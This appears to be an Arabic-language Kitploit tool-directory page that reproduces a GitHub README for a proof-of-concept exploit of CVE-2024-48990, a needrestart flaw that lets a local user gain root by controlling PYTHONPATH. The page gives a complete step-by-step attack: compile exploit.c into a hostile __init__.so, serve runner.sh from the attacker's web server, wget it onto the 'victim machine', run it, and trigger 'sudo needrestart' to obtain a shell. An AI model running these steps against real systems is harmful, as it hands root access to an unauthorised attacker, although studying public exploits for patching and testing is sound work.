Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-48990 — PoC حول CVE-2024-48990. اكتشفت Qualys أن needrestart، قبل الإصدار 3.8، يسمح للمهاجمين المحليين بتنفيذ تعليمات برمجية عشوائية بصلاحيات الجذر (root) عن طريق خداع needrestart لتشغيل مترجم بايثون مع متغير بيئة PYTHONPATH يتحكم فيه المهاجم. (NIST) | Kitploit
أدوات/GitHubGitHub/grecosamuel/cve-2024-48990
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالتعلم والتعليم
GitHubgrecosamuel/cve-2024-48990

CVE-2024-48990

PoC حول CVE-2024-48990. اكتشفت Qualys أن needrestart، قبل الإصدار 3.8، يسمح للمهاجمين المحليين بتنفيذ تعليمات برمجية عشوائية بصلاحيات الجذر (root) عن طريق خداع needrestart لتشغيل مترجم بايثون مع متغير بيئة PYTHONPATH يتحكم فيه المهاجم. (NIST)

عرض المستودع
منذ 8 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-48990

[!WARNING] هذه الملفات والمعلومات مخصّصة للأغراض التعليمية فقط. المؤلف غير مسؤول عن أي سلوك خبيث. جميع المعلومات المقدّمة لا تهدف إلى التحريض على أي نوع من الجرائم أو الانتهاكات.

الوصف

اكتشفت Qualys أن needrestart، قبل الإصدار 3.8، يسمح للمهاجمين المحليين بتنفيذ كود تعسفي بصلاحيات الجذر عن طريق خداع needrestart لتشغيل مفسّر بايثون مع متغير بيئة PYTHONPATH يتحكم فيه المهاجم. راجع NIST للحصول على التفاصيل الرسمية.

إثبات المفهوم

  1. قم بتنزيل المستودع من git

git clone https://github.com/grecosamuel/CVE-2024-48990.git

  1. قم بتجميع مكتبة exploit.c لإنشاء مكتبة ELF صالحة وسمّها __init__.so

gcc -shared -fPIC -o __init__.so exploit.c

  1. قم بتغيير <IP> و <PORT> في runner.sh، السطر 7 والسطر 10، إلى عنوان IP والمنفذ الخاصين بخادم الويب الخاص بك.
  2. قم بتشغيل خادم الويب

python3 -m http.server

  1. قم بتنزيل runner على جهاز الضحية

wget http://IP:PORT/runner.sh

  1. قم بمنح صلاحية التنفيذ لـ runner

chmod +x runner.sh

  1. قم بتشغيل السكربت

./runner.sh

  1. قم بتشغيل needrestart بصلاحية sudo

sudo needrestart

عند ظهور [*] CVE module created اضغط CTRL+C لإيقاف العملية واحصل على الشل!

تنزيل الأداة